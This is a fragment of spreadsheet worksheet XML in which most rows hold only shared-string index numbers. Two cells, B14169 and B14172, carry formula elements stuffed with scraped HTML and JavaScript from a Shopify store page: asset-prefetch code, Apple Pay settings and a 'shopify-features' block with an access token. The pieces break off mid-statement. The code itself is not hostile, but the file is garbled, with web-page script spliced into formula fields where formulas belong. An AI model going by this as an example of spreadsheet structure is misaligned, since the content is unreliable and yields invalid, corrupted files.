        <v>55</v>
      </c>
      <c r="B14046" t="s">
        <v>1576</v>
      </c>
    </row>
    <row r="14047" spans="1:2">
      <c r="A14047" t="s">
        <v>55</v>
      </c>
      <c r="B14047" t="s">
        <v>1577</v>
      </c>
    </row>
    <row r="14048" spans="1:2">
      <c r="A14048" t="s">
        <v>55</v>
      </c>
      <c r="B14048" t="s">
        <v>1578</v>
      </c>
    </row>
    <row r="14049" spans="1:2">
      <c r="A14049" t="s">
        <v>55</v>
      </c>
      <c r="B14049" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="14050" spans="1:2">
      <c r="A14050" t="s">
        <v>55</v>
      </c>
      <c r="B14050" t="s">
        <v>1580</v>
      </c>
    </row>
    <row r="14051" spans="1:2">
      <c r="A14051" t="s">
        <v>55</v>
      </c>
      <c r="B14051" t="s">
        <v>1581</v>
      </c>
    </row>
    <row r="14052" spans="1:2">
      <c r="A14052" t="s">
        <v>55</v>
      </c>
      <c r="B14052" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="14053" spans="1:2">
      <c r="A14053" t="s">
        <v>55</v>
      </c>
      <c r="B14053" t="s">
        <v>1583</v>
      </c>
    </row>
    <row r="14054" spans="1:2">
      <c r="A14054" t="s">
        <v>55</v>
      </c>
      <c r="B14054" t="s">
        <v>1584</v>
      </c>
    </row>
    <row r="14055" spans="1:2">
      <c r="A14055" t="s">
        <v>55</v>
      </c>
      <c r="B14055" t="s">
        <v>1585</v>
      </c>
    </row>
    <row r="14056" spans="1:2">
      <c r="A14056" t="s">
        <v>55</v>
      </c>
      <c r="B14056" t="s">
        <v>1586</v>
      </c>
    </row>
    <row r="14057" spans="1:2">
      <c r="A14057" t="s">
        <v>55</v>
      </c>
      <c r="B14057" t="s">
        <v>1587</v>
      </c>
    </row>
    <row r="14058" spans="1:2">
      <c r="A14058" t="s">
        <v>55</v>
      </c>
      <c r="B14058" t="s">
        <v>1588</v>
      </c>
    </row>
    <row r="14059" spans="1:2">
      <c r="A14059" t="s">
        <v>55</v>
      </c>
      <c r="B14059" t="s">
        <v>1589</v>
      </c>
    </row>
    <row r="14060" spans="1:2">
      <c r="A14060" t="s">
        <v>55</v>
      </c>
      <c r="B14060" t="s">
        <v>1590</v>
      </c>
    </row>
    <row r="14061" spans="1:2">
      <c r="A14061" t="s">
        <v>55</v>
      </c>
      <c r="B14061" t="s">
        <v>1591</v>
      </c>
    </row>
    <row r="14062" spans="1:2">
      <c r="A14062" t="s">
        <v>55</v>
      </c>
      <c r="B14062" t="s">
        <v>406</v>
      </c>
    </row>
    <row r="14063" spans="1:2">
      <c r="A14063" t="s">
        <v>55</v>
      </c>
      <c r="B14063" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="14064" spans="1:2">
      <c r="A14064" t="s">
        <v>55</v>
      </c>
      <c r="B14064" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="14065" spans="1:2">
      <c r="A14065" t="s">
        <v>55</v>
      </c>
      <c r="B14065" t="s">
        <v>1593</v>
      </c>
    </row>
    <row r="14066" spans="1:2">
      <c r="A14066" t="s">
        <v>55</v>
      </c>
      <c r="B14066" t="s">
        <v>1594</v>
      </c>
    </row>
    <row r="14067" spans="1:2">
      <c r="A14067" t="s">
        <v>55</v>
      </c>
      <c r="B14067" t="s">
        <v>1595</v>
      </c>
    </row>
    <row r="14068" spans="1:2">
      <c r="A14068" t="s">
        <v>55</v>
      </c>
      <c r="B14068" t="s">
        <v>1596</v>
      </c>
    </row>
    <row r="14069" spans="1:2">
      <c r="A14069" t="s">
        <v>55</v>
      </c>
      <c r="B14069" t="s">
        <v>1597</v>
      </c>
    </row>
    <row r="14070" spans="1:2">
      <c r="A14070" t="s">
        <v>55</v>
      </c>
      <c r="B14070" t="s">
        <v>1598</v>
      </c>
    </row>
    <row r="14071" spans="1:2">
      <c r="A14071" t="s">
        <v>55</v>
      </c>
      <c r="B14071" t="s">
        <v>1599</v>
      </c>
    </row>
    <row r="14072" spans="1:2">
      <c r="A14072" t="s">
        <v>55</v>
      </c>
      <c r="B14072" t="s">
        <v>1600</v>
      </c>
    </row>
    <row r="14073" spans="1:2">
      <c r="A14073" t="s">
        <v>55</v>
      </c>
      <c r="B14073" t="s">
        <v>1601</v>
      </c>
    </row>
    <row r="14074" spans="1:2">
      <c r="A14074" t="s">
        <v>55</v>
      </c>
      <c r="B14074" t="s">
        <v>5693</v>
      </c>
    </row>
    <row r="14075" spans="1:2">
      <c r="A14075" t="s">
        <v>242</v>
      </c>
      <c r="B14075" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="14076" spans="1:2">
      <c r="A14076" t="s">
        <v>243</v>
      </c>
      <c r="B14076" t="s">
        <v>5694</v>
      </c>
    </row>
    <row r="14077" spans="1:2">
      <c r="A14077" t="s">
        <v>243</v>
      </c>
      <c r="B14077" t="s">
        <v>5695</v>
      </c>
    </row>
    <row r="14078" spans="1:2">
      <c r="A14078" t="s">
        <v>243</v>
      </c>
      <c r="B14078" t="s">
        <v>5696</v>
      </c>
    </row>
    <row r="14079" spans="1:2">
      <c r="A14079" t="s">
        <v>243</v>
      </c>
      <c r="B14079" t="s">
        <v>5697</v>
      </c>
    </row>
    <row r="14080" spans="1:2">
      <c r="A14080" t="s">
        <v>243</v>
      </c>
      <c r="B14080" t="s">
        <v>5698</v>
      </c>
    </row>
    <row r="14081" spans="1:2">
      <c r="A14081" t="s">
        <v>243</v>
      </c>
      <c r="B14081" t="s">
        <v>5699</v>
      </c>
    </row>
    <row r="14082" spans="1:2">
      <c r="A14082" t="s">
        <v>243</v>
      </c>
      <c r="B14082" t="s">
        <v>5700</v>
      </c>
    </row>
    <row r="14083" spans="1:2">
      <c r="A14083" t="s">
        <v>243</v>
      </c>
      <c r="B14083" t="s">
        <v>5701</v>
      </c>
    </row>
    <row r="14084" spans="1:2">
      <c r="A14084" t="s">
        <v>243</v>
      </c>
      <c r="B14084" t="s">
        <v>5702</v>
      </c>
    </row>
    <row r="14085" spans="1:2">
      <c r="A14085" t="s">
        <v>243</v>
      </c>
      <c r="B14085" t="s">
        <v>5703</v>
      </c>
    </row>
    <row r="14086" spans="1:2">
      <c r="A14086" t="s">
        <v>243</v>
      </c>
      <c r="B14086" t="s">
        <v>5704</v>
      </c>
    </row>
    <row r="14087" spans="1:2">
      <c r="A14087" t="s">
        <v>243</v>
      </c>
      <c r="B14087" t="s">
        <v>5705</v>
      </c>
    </row>
    <row r="14088" spans="1:2">
      <c r="A14088" t="s">
        <v>243</v>
      </c>
      <c r="B14088" t="s">
        <v>5706</v>
      </c>
    </row>
    <row r="14089" spans="1:2">
      <c r="A14089" t="s">
        <v>243</v>
      </c>
      <c r="B14089" t="s">
        <v>5707</v>
      </c>
    </row>
    <row r="14090" spans="1:2">
      <c r="A14090" t="s">
        <v>243</v>
      </c>
      <c r="B14090" t="s">
        <v>5708</v>
      </c>
    </row>
    <row r="14091" spans="1:2">
      <c r="A14091" t="s">
        <v>243</v>
      </c>
      <c r="B14091" t="s">
        <v>5709</v>
      </c>
    </row>
    <row r="14092" spans="1:2">
      <c r="A14092" t="s">
        <v>243</v>
      </c>
      <c r="B14092" t="s">
        <v>5710</v>
      </c>
    </row>
    <row r="14093" spans="1:2">
      <c r="A14093" t="s">
        <v>243</v>
      </c>
      <c r="B14093" t="s">
        <v>5711</v>
      </c>
    </row>
    <row r="14094" spans="1:2">
      <c r="A14094" t="s">
        <v>243</v>
      </c>
      <c r="B14094" t="s">
        <v>5712</v>
      </c>
    </row>
    <row r="14095" spans="1:2">
      <c r="A14095" t="s">
        <v>243</v>
      </c>
      <c r="B14095" t="s">
        <v>5713</v>
      </c>
    </row>
    <row r="14096" spans="1:2">
      <c r="A14096" t="s">
        <v>243</v>
      </c>
      <c r="B14096" t="s">
        <v>5714</v>
      </c>
    </row>
    <row r="14097" spans="1:2">
      <c r="A14097" t="s">
        <v>243</v>
      </c>
      <c r="B14097" t="s">
        <v>5715</v>
      </c>
    </row>
    <row r="14098" spans="1:2">
      <c r="A14098" t="s">
        <v>243</v>
      </c>
      <c r="B14098" t="s">
        <v>5716</v>
      </c>
    </row>
    <row r="14099" spans="1:2">
      <c r="A14099" t="s">
        <v>243</v>
      </c>
      <c r="B14099" t="s">
        <v>5717</v>
      </c>
    </row>
    <row r="14100" spans="1:2">
      <c r="A14100" t="s">
        <v>243</v>
      </c>
      <c r="B14100" t="s">
        <v>5718</v>
      </c>
    </row>
    <row r="14101" spans="1:2">
      <c r="A14101" t="s">
        <v>243</v>
      </c>
      <c r="B14101" t="s">
        <v>5719</v>
      </c>
    </row>
    <row r="14102" spans="1:2">
      <c r="A14102" t="s">
        <v>243</v>
      </c>
      <c r="B14102" t="s">
        <v>5720</v>
      </c>
    </row>
    <row r="14103" spans="1:2">
      <c r="A14103" t="s">
        <v>243</v>
      </c>
      <c r="B14103" t="s">
        <v>5721</v>
      </c>
    </row>
    <row r="14104" spans="1:2">
      <c r="A14104" t="s">
        <v>243</v>
      </c>
      <c r="B14104" t="s">
        <v>5722</v>
      </c>
    </row>
    <row r="14105" spans="1:2">
      <c r="A14105" t="s">
        <v>243</v>
      </c>
      <c r="B14105" t="s">
        <v>5723</v>
      </c>
    </row>
    <row r="14106" spans="1:2">
      <c r="A14106" t="s">
        <v>243</v>
      </c>
      <c r="B14106" t="s">
        <v>5724</v>
      </c>
    </row>
    <row r="14107" spans="1:2">
      <c r="A14107" t="s">
        <v>243</v>
      </c>
      <c r="B14107" t="s">
        <v>5725</v>
      </c>
    </row>
    <row r="14108" spans="1:2">
      <c r="A14108" t="s">
        <v>243</v>
      </c>
      <c r="B14108" t="s">
        <v>5726</v>
      </c>
    </row>
    <row r="14109" spans="1:2">
      <c r="A14109" t="s">
        <v>243</v>
      </c>
      <c r="B14109" t="s">
        <v>5727</v>
      </c>
    </row>
    <row r="14110" spans="1:2">
      <c r="A14110" t="s">
        <v>243</v>
      </c>
      <c r="B14110" t="s">
        <v>5728</v>
      </c>
    </row>
    <row r="14111" spans="1:2">
      <c r="A14111" t="s">
        <v>243</v>
      </c>
      <c r="B14111" t="s">
        <v>5729</v>
      </c>
    </row>
    <row r="14112" spans="1:2">
      <c r="A14112" t="s">
        <v>243</v>
      </c>
      <c r="B14112" t="s">
        <v>5730</v>
      </c>
    </row>
    <row r="14113" spans="1:2">
      <c r="A14113" t="s">
        <v>243</v>
      </c>
      <c r="B14113" t="s">
        <v>5731</v>
      </c>
    </row>
    <row r="14114" spans="1:2">
      <c r="A14114" t="s">
        <v>243</v>
      </c>
      <c r="B14114" t="s">
        <v>5732</v>
      </c>
    </row>
    <row r="14115" spans="1:2">
      <c r="A14115" t="s">
        <v>243</v>
      </c>
      <c r="B14115" t="s">
        <v>5733</v>
      </c>
    </row>
    <row r="14116" spans="1:2">
      <c r="A14116" t="s">
        <v>243</v>
      </c>
      <c r="B14116" t="s">
        <v>5734</v>
      </c>
    </row>
    <row r="14117" spans="1:2">
      <c r="A14117" t="s">
        <v>243</v>
      </c>
      <c r="B14117" t="s">
        <v>5735</v>
      </c>
    </row>
    <row r="14118" spans="1:2">
      <c r="A14118" t="s">
        <v>244</v>
      </c>
      <c r="B14118" t="s">
        <v>5736</v>
      </c>
    </row>
    <row r="14119" spans="1:2">
      <c r="A14119" t="s">
        <v>244</v>
      </c>
      <c r="B14119" t="s">
        <v>5737</v>
      </c>
    </row>
    <row r="14120" spans="1:2">
      <c r="A14120" t="s">
        <v>244</v>
      </c>
      <c r="B14120" t="s">
        <v>5738</v>
      </c>
    </row>
    <row r="14121" spans="1:2">
      <c r="A14121" t="s">
        <v>244</v>
      </c>
      <c r="B14121" t="s">
        <v>3961</v>
      </c>
    </row>
    <row r="14122" spans="1:2">
      <c r="A14122" t="s">
        <v>244</v>
      </c>
      <c r="B14122" t="s">
        <v>5739</v>
      </c>
    </row>
    <row r="14123" spans="1:2">
      <c r="A14123" t="s">
        <v>244</v>
      </c>
      <c r="B14123" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="14124" spans="1:2">
      <c r="A14124" t="s">
        <v>244</v>
      </c>
      <c r="B14124" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="14125" spans="1:2">
      <c r="A14125" t="s">
        <v>244</v>
      </c>
      <c r="B14125" t="s">
        <v>265</v>
      </c>
    </row>
    <row r="14126" spans="1:2">
      <c r="A14126" t="s">
        <v>244</v>
      </c>
      <c r="B14126" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="14127" spans="1:2">
      <c r="A14127" t="s">
        <v>244</v>
      </c>
      <c r="B14127" t="s">
        <v>267</v>
      </c>
    </row>
    <row r="14128" spans="1:2">
      <c r="A14128" t="s">
        <v>244</v>
      </c>
      <c r="B14128" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="14129" spans="1:2">
      <c r="A14129" t="s">
        <v>244</v>
      </c>
      <c r="B14129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="14130" spans="1:2">
      <c r="A14130" t="s">
        <v>244</v>
      </c>
      <c r="B14130" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="14131" spans="1:2">
      <c r="A14131" t="s">
        <v>244</v>
      </c>
      <c r="B14131" t="s">
        <v>271</v>
      </c>
    </row>
    <row r="14132" spans="1:2">
      <c r="A14132" t="s">
        <v>244</v>
      </c>
      <c r="B14132" t="s">
        <v>272</v>
      </c>
    </row>
    <row r="14133" spans="1:2">
      <c r="A14133" t="s">
        <v>244</v>
      </c>
      <c r="B14133" t="s">
        <v>273</v>
      </c>
    </row>
    <row r="14134" spans="1:2">
      <c r="A14134" t="s">
        <v>244</v>
      </c>
      <c r="B14134" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="14135" spans="1:2">
      <c r="A14135" t="s">
        <v>244</v>
      </c>
      <c r="B14135" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="14136" spans="1:2">
      <c r="A14136" t="s">
        <v>244</v>
      </c>
      <c r="B14136" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="14137" spans="1:2">
      <c r="A14137" t="s">
        <v>244</v>
      </c>
      <c r="B14137" t="s">
        <v>277</v>
      </c>
    </row>
    <row r="14138" spans="1:2">
      <c r="A14138" t="s">
        <v>244</v>
      </c>
      <c r="B14138" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="14139" spans="1:2">
      <c r="A14139" t="s">
        <v>244</v>
      </c>
      <c r="B14139" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="14140" spans="1:2">
      <c r="A14140" t="s">
        <v>244</v>
      </c>
      <c r="B14140" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="14141" spans="1:2">
      <c r="A14141" t="s">
        <v>244</v>
      </c>
      <c r="B14141" t="s">
        <v>5740</v>
      </c>
    </row>
    <row r="14142" spans="1:2">
      <c r="A14142" t="s">
        <v>244</v>
      </c>
      <c r="B14142" t="s">
        <v>5741</v>
      </c>
    </row>
    <row r="14143" spans="1:2">
      <c r="A14143" t="s">
        <v>244</v>
      </c>
      <c r="B14143" t="s">
        <v>5742</v>
      </c>
    </row>
    <row r="14144" spans="1:2">
      <c r="A14144" t="s">
        <v>244</v>
      </c>
      <c r="B14144" t="s">
        <v>5743</v>
      </c>
    </row>
    <row r="14145" spans="1:2">
      <c r="A14145" t="s">
        <v>244</v>
      </c>
      <c r="B14145" t="s">
        <v>5744</v>
      </c>
    </row>
    <row r="14146" spans="1:2">
      <c r="A14146" t="s">
        <v>244</v>
      </c>
      <c r="B14146" t="s">
        <v>5745</v>
      </c>
    </row>
    <row r="14147" spans="1:2">
      <c r="A14147" t="s">
        <v>244</v>
      </c>
      <c r="B14147" t="s">
        <v>5746</v>
      </c>
    </row>
    <row r="14148" spans="1:2">
      <c r="A14148" t="s">
        <v>244</v>
      </c>
      <c r="B14148" t="s">
        <v>5747</v>
      </c>
    </row>
    <row r="14149" spans="1:2">
      <c r="A14149" t="s">
        <v>244</v>
      </c>
      <c r="B14149" t="s">
        <v>5748</v>
      </c>
    </row>
    <row r="14150" spans="1:2">
      <c r="A14150" t="s">
        <v>244</v>
      </c>
      <c r="B14150" t="s">
        <v>5749</v>
      </c>
    </row>
    <row r="14151" spans="1:2">
      <c r="A14151" t="s">
        <v>244</v>
      </c>
      <c r="B14151" t="s">
        <v>5750</v>
      </c>
    </row>
    <row r="14152" spans="1:2">
      <c r="A14152" t="s">
        <v>244</v>
      </c>
      <c r="B14152" t="s">
        <v>5751</v>
      </c>
    </row>
    <row r="14153" spans="1:2">
      <c r="A14153" t="s">
        <v>244</v>
      </c>
      <c r="B14153" t="s">
        <v>5752</v>
      </c>
    </row>
    <row r="14154" spans="1:2">
      <c r="A14154" t="s">
        <v>244</v>
      </c>
      <c r="B14154" t="s">
        <v>5753</v>
      </c>
    </row>
    <row r="14155" spans="1:2">
      <c r="A14155" t="s">
        <v>244</v>
      </c>
      <c r="B14155" t="s">
        <v>5754</v>
      </c>
    </row>
    <row r="14156" spans="1:2">
      <c r="A14156" t="s">
        <v>244</v>
      </c>
      <c r="B14156" t="s">
        <v>5755</v>
      </c>
    </row>
    <row r="14157" spans="1:2">
      <c r="A14157" t="s">
        <v>244</v>
      </c>
      <c r="B14157" t="s">
        <v>5756</v>
      </c>
    </row>
    <row r="14158" spans="1:2">
      <c r="A14158" t="s">
        <v>244</v>
      </c>
      <c r="B14158" t="s">
        <v>5757</v>
      </c>
    </row>
    <row r="14159" spans="1:2">
      <c r="A14159" t="s">
        <v>244</v>
      </c>
      <c r="B14159" t="s">
        <v>5758</v>
      </c>
    </row>
    <row r="14160" spans="1:2">
      <c r="A14160" t="s">
        <v>244</v>
      </c>
      <c r="B14160" t="s">
        <v>5759</v>
      </c>
    </row>
    <row r="14161" spans="1:2">
      <c r="A14161" t="s">
        <v>245</v>
      </c>
      <c r="B14161" t="s">
        <v>5760</v>
      </c>
    </row>
    <row r="14162" spans="1:2">
      <c r="A14162" t="s">
        <v>245</v>
      </c>
      <c r="B14162" t="s">
        <v>5761</v>
      </c>
    </row>
    <row r="14163" spans="1:2">
      <c r="A14163" t="s">
        <v>245</v>
      </c>
      <c r="B14163" t="s">
        <v>5762</v>
      </c>
    </row>
    <row r="14164" spans="1:2">
      <c r="A14164" t="s">
        <v>245</v>
      </c>
      <c r="B14164" t="s">
        <v>5763</v>
      </c>
    </row>
    <row r="14165" spans="1:2">
      <c r="A14165" t="s">
        <v>245</v>
      </c>
      <c r="B14165" t="s">
        <v>5764</v>
      </c>
    </row>
    <row r="14166" spans="1:2">
      <c r="A14166" t="s">
        <v>245</v>
      </c>
      <c r="B14166" t="s">
        <v>5765</v>
      </c>
    </row>
    <row r="14167" spans="1:2">
      <c r="A14167" t="s">
        <v>245</v>
      </c>
      <c r="B14167" t="s">
        <v>5766</v>
      </c>
    </row>
    <row r="14168" spans="1:2">
      <c r="A14168" t="s">
        <v>245</v>
      </c>
      <c r="B14168" t="s">
        <v>5767</v>
      </c>
    </row>
    <row r="14169" spans="1:2">
      <c r="A14169" t="s">
        <v>245</v>
      </c>
      <c r="B14169">
        <f> link.onerror = callback;
        document.head.appendChild(link);
      } else {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', url, true);
        xhr.onloadend = callback;
        xhr.send();
      }
    }
    function prefetchAssets() {
      var resources = [].concat(
        scripts.map(function(url) { return [url, 'script']; }),
        styles.map(function(url) { return [url, 'style']; })
      );
      var index = 0;
      (function next() {
        var res = resources[index++];
        if (res) prefetch(res[0], res[1], next);
      })();
    }
    addEventListener('load', prefetchAssets);
   })();
&lt;/script&gt;
&lt;script id="apple-pay-shop-capabilities" type="application/json"&gt;{"shopId":25572212835,"countryCode":"GB","currencyCode":"USD","merchantCapabilities":["supports3DS"],"merchantId":"gid:\/\/shopify\/Shop\/25572212835","merchantName":" Mrs Wordsmith Global","requiredBillingContactFields":["postalAddress","email"],"requiredShippingContactFields":["postalAddress","email"],"shippingType":"shipping","supportedNetworks":["visa","maestro","masterCard","amex","discover","elo"],"total":{"type":"pending","label":" Mrs Wordsmith Global","amount":"1.00"},"shopifyPaymentsEnabled":true,"supportsSubscriptions":false}&lt;/script&gt;
&lt;script id="shopify-features" type="application/json"&gt;{"accessToken":"9445e0eb6e1900268ef8d2c429bc832a","betas":["rich-media-storefront-analytics"],"domain":"mrswordsmith.com","predictiveSearch":true,"shopId":25572212835,"smart_payment_buttons_url":"https:\/\/cdn.shopify.com\/shopifycloud\/payment-sheet\/assets\/latest\/spb.en.js?v=2","dynamic_checkout_cart_url":"https:\/\/cdn.shopify.com\/shopifycloud\/payment-sheet\/assets\/latest\/dynamic-checkout-cart.en.js?v=2","locale":"en","optimusEnabled":false}&lt;/script&gt;
&lt;script&gt;var</f>
        <v>0</v>
      </c>
    </row>
    <row r="14170" spans="1:2">
      <c r="A14170" t="s">
        <v>245</v>
      </c>
      <c r="B14170" t="s">
        <v>5768</v>
      </c>
    </row>
    <row r="14171" spans="1:2">
      <c r="A14171" t="s">
        <v>245</v>
      </c>
      <c r="B14171" t="s">
        <v>5769</v>
      </c>
    </row>
    <row r="14172" spans="1:2">
      <c r="A14172" t="s">
        <v>245</v>
      </c>
      <c r="B14172">
        <f> true;&lt;/script&gt;
&lt;script&gt;!function(o){o.addEventListener("DOMContentLoaded",function(){window. Shopify=window. Shopify||{},window.Shopify.recaptchaV3=window.</f>
        <v>0</v>
      </c>
    </row>
    <row r="14173" spans="1:2">
      <c r="A14173" t="s">
        <v>245</v>
      </c>
      <c r="B14173" t="s">
        <v>5770</v>
      </c>
    </row>
    <row r="14174" spans="1:2">
      <c r="A14174" t="s">
        <v>245</v>
      </c>
      <c r="B14174" t="s">
        <v>5771</v>
      </c>
    </row>
    <row r="14175" spans="1:2">
      <c r="A14175" t="s">
        <v>245</v>
      </c>
      <c r="B14175" t="s">
        <v>5772</v>
      </c>
    </row>
    <row r="14176" spans="1:2">
      <c r="A14176" t="s">
        <v>245</v>
      </c>
      <c r="B14176" t="s">
        <v>5773</v>
      </c>
    </row>
    <row r="14177" spans="1:2">
      <c r="A14177" t="s">
        <v>245</v>
      </c>
      <c r="B14177" t="s">
        <v>5774</v>
      </c>
    </row>
    <row r="14178" spans="1:2">
      <c r="A14178" t="s">
        <v>245</v>
      </c>
      <c r="B14178" t="s">
        <v>5775</v>
      </c>
    </row>
    <row r="14179" spans="1:2">
      <c r="A14179" t="s">
        <v>245</v>
      </c>
      <c r="B14179" t="s">
        <v>5776</v>
      </c>
    </row>
    <row r="14180" spans="1:2">
      <c r="A14180" t="s">
        <v>181</v>
      </c>
      <c r="B14180" t="s">
        <v>4562</v>
      </c>
    </row>
    <row r="14181" spans="1:2">
      <c r="A14181" t="s">
        <v>181</v>
      </c>
      <c r="B14181" t="s">
        <v>4563</v>
      </c>
    </row>
    <row r="14182" spans="1:2">
      <c r="A14182" t="s">
        <v>181</v>
      </c>
      <c r="B14182" t="s">
        <v>4564</v>
      </c>
    </row>
    <row r="14183" spans="1:2">
      <c r="A14183" t="s">
        <v>181</v>
      </c>
      <c r="B14183" t="s">
        <v>4565</v>
      </c>
    </row>
    <row r="14184" spans="1:2">
      <c r="A14184" t="s">
        <v>181</v>
      </c>
      <c r="B14184" t="s">
        <v>4566</v>
      </c>
    </row>
    <row r="14185" spans="1:2">
      <c r="A14185" t="s">
        <v>181</v>
      </c>
      <c r="B14185" t="s">
        <v>4567</v>
      </c>
    </row>
    <row r="14186" spans="1:2">
      <c r="A14186" t="s">
        <v>181</v>
      </c>
      <c r="B14186" t="s">
        <v>4568</v>
      </c>
    </row>
    <row r="14187" spans="1:2">
      <c r="A14187" t="s">
        <v>181</v>
      </c>
      <c r="B14187" t="s">
        <v>4569</v>
      </c>
    </row>
    <row r="14188" spans="1:2">
      <c r="A14188" t="s">
        <v>181</v>
      </c>
      <c r="B14188" t="s">
        <v>4570</v>
      </c>
    </row>
    <row r="14189" spans="1:2">
      <c r="A14189" t="s">
        <v>181</v>
      </c>
      <c r="B14189" t="s">
        <v>4571</v>
      </c>
    </row>
    <row r="14190" spans="1:2">
      <c r="A14190" t="s">
        <v>181</v>
      </c>
      <c r="B14190" t="s">
        <v>4572</v>
      </c>
    </row>
    <row r="14191" spans="1:2">
      <c r="A14191" t="s">
        <v>181</v>
      </c>
      <c r="B14191" t="s">
        <v>4573</v>
      </c>
    </row>
    <row r="14192" spans="1:2">
      <c r="A14192" t="s">
        <v>181</v>
      </c>
      <c r="B14192" t="s">
        <v>4574</v>
      </c>
    </row>
    <row r="14193" spans="1:2">
      <c r="A14193" t="s">
        <v>181</v>
      </c>
      <c r="B14193" t="s">
        <v>4575</v>
      </c>
    </row>
    <row r="14194" spans="1:2">
      <c r="A14194" t="s">
        <v>181</v>
      </c>
      <c r="B14194" t="s">
        <v>4576</v>
      </c>
    </row>
    <row r="14195" spans="1:2">
      <c r="A14195" t="s">
        <v>181</v>
      </c>
      <c r="B14195" t="s">
        <v>4577</v>
      </c>
    </row>
    <row r="14196" spans="1:2">
      <c r="A14196" t="s">
        <v>181</v>
      </c>
      <c r="B14196" t="s">
        <v>4578</v>
      </c>
    </row>
    <row r="14197" spans="1:2">
      <c r="A14197" t="s">
        <v>181</v>
      </c>
      <c r="B14197" t="s">
        <v>4579</v>
      </c>
    </row>
    <row r="14198" spans="1:2">
      <c r="A14198" t="s">
        <v>181</v>
      </c>
      <c r="B14198" t="s">
        <v>4580</v>
      </c>
    </row>
    <row r="14199" spans="1:2">
      <c r="A14199" t="s">
        <v>181</v>
      </c>
      <c r="B14199" t="s">
        <v>4581</v>
      </c>
    </row>
    <row r="14200" spans="1:2">
      <c r="A14200" t="s">
        <v>181</v>
      </c>
      <c r="B14200" t="s">
        <v>4582</v>
      </c>
    </row>
    <row r="14201" spans="1:2">
      <c r="A14201" t="s">
        <v>181</v>
      </c>
      <c r="B14201" t="s">
        <v>4583</v>
      </c>
    </row>
    <row r="14202" spans="1:2">
      <c r="A14202" t="s">
        <v>181</v>
      </c>
      <c r="B14202" t="s">
        <v>4584</v>
      </c>
    </row>
    <row r="14203" spans="1:2">
      <c r="A14203" t="s">
        <v>181</v>
      </c>
      <c r="B14203" t="s">
        <v>4585</v>
      </c>
    </row>
    <row r="14204" spans="1:2">
      <c r="A14204" t="s">
        <v>181</v>
      </c>
      <c r="B14204" t="s">
        <v>4586</v>
      </c>
    </row>
    <row r="14205" spans="1:2">
      <c r="A14205" t="s">
        <v>181</v>
      </c>
      <c r="B14205" t="s">
        <v>4587</v>
      </c>
    </row>
    <row r="14206" spans="1:2">
      <c r="A14206" t="s">
        <v>71</v>
      </c>
      <c r="B14206" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="14207" spans="1:2">
      <c r="A14207" t="s">
        <v>246</v>
      </c>
      <c r="B14207" t="s">
        <v>5777</v>
      </c>
    </row>
    <row r="14208" spans="1:2">
      <c r="A14208" t="s">
        <v>246</v>
      </c>
      <c r="B14208" t="s">
        <v>5778</v>
      </c>
    </row>
    <row r="14209" spans="1:2">
      <c r="A14209" t="s">
        <v>246</v>
      </c>
      <c r="B14209" t="s">
        <v>5779</v>
      </c>
    </row>
    <row r="14210" spans="1:2">
      <c r="A14210" t="s">
        <v>246</v>
      </c>
      <c r="B14210" t="s">
        <v>5780</v>
      </c>
    </row>
    <row r="14211" spans="1:2">
      <c r="A14211" t="s">
        <v>246</v>
      </c>
      <c r="B14211" t="s">
        <v>5781</v>
      </c>
    </row>
    <row r="14212" spans="1:2">
      <c r="A14212" t="s">
        <v>246</v>
      </c>
      <c r="B14212" t="s">
        <v>5782</v>
      </c>
    </row>
    <row r="14213" spans="1:2">
      <c r="A14213" t="s">
        <v>246</v>
      </c>
      <c r="B14213" t="s">
        <v>5783</v>
      </c>
    </row>
    <row r="14214" spans="1:2">
      <c r="A14214" t="s">
        <v>246</v>
      </c>
      <c r="B14214" t="s">
        <v>5784</v>
      </c>
    </row>
    <row r="14215" spans="1:2">
      <c r="A14215" t="s">
        <v>246</v>
      </c>
      <c r="B14215" t="s">
        <v>5785</v>
      </c>
    </row>
    <row r="14216" spans="1:2">
      <c r="A14216" t="s">
        <v>246</v>
      </c>
      <c r="B14216" t="s">
        <v>5786</v>
      </c>
    </row>
    <row r="14217" spans="1:2">
      <c r="A14217" t="s">
        <v>246</v>
      </c>
      <c r="B14217" t="s">
        <v>5787</v>
      </c>
    </row>
    <row r="14218" spans="1:2">
      <c r="A14218" t="s">
        <v>246</v>
      </c>
      <c r="B14218" t="s">
        <v>5788</v>
      </c>
    </row>
    <row r="14219" spans="1:2">
      <c r="A14219" t="s">
        <v>246</v>
      </c>
      <c r="B14219" t="s">
        <v>5789</v>
      </c>
    </row>
    <row r="14220" spans="1:2">
      <c r="A14220" t="s">
        <v>246</v>
      </c>
      <c r="B14220" t="s">
        <v>5790</v>
      </c>
    </row>
    <row r="14221" spans="1:2">
      <c r="A14221" t="s">
        <v>246</v>
      </c>
      <c r="B14221" t="s">
        <v>5791</v>
      </c>
    </row>
    <row r="14222" spans="1:2">
      <c r="A14222" t="s">
        <v>246</v>
      </c>
      <c r="B14222" t="s">
        <v>5792</v>
      </c>
    </row>
    <row r="14223" spans="1:2">
      <c r="A14223" t="s">
        <v>246</v>
      </c>
      <c r="B14223" t="s">
        <v>5793</v>
      </c>
    </row>
    <row r="14224" spans="1:2">
      <c r="A14224" t="s">
        <v>246</v>
      </c>
      <c r="B14224" t="s">
        <v>5794</v>
      </c>
    </row>
    <row r="14225" spans="1:2">
      <c r="A14225" t="s">
        <v>246</v>
      </c>
      <c r="B14225" t="s">
        <v>5795</v>
      </c>
    </row>
    <row r="14226" spans="1:2">
      <c r="A14226" t="s">
        <v>246</v>
      </c>
      <c r="B14226" t="s">
        <v>5796</v>
      </c>
    </row>
    <row r="14227" spans="1:2">
